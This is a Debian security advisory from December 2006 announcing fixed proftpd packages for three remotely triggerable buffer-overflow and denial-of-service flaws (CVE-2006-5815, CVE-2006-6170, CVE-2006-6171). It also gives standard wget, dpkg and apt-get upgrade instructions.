http://www.debian.org/security/                         Moritz Muehlenhoff
December 1st, 2006                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : proftpd
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-5815 CVE-2006-6170 CVE-2006-6171
Debian Bug     : 399070

Due to technical problems yesterday's proftpd update lacked a build for
the amd64 architecture, which is now available.

Several remote vulnerabilities have been discovered in the proftpd FTP
daemon, which may lead to the execution of arbitrary code or denial of
service. The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2006-5815

    It was discovered that a buffer overflow in the sreplace() function
    may lead to denial of service and possibly the execution of arbitrary
    code.

CVE-2006-6170

    It was discovered that a buffer overflow in the mod_tls addon module
    may lead to the execution of arbitrary code.

CVE-2006-6171

    It was discovered that insufficient validation of FTP command buffer
    size limits may lead to denial of service. Due to unclear information
    this issue was already fixed in DSA-1218 as CVE-2006-5815.

For the stable distribution (sarge) these problems have been fixed in version
1.2.10-15sarge3.

For the unstable distribution (sid) this problem has been fixed in
version 1.3.0-16 of the proftpd-dfsg package.

We recommend that you upgrade your proftpd package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------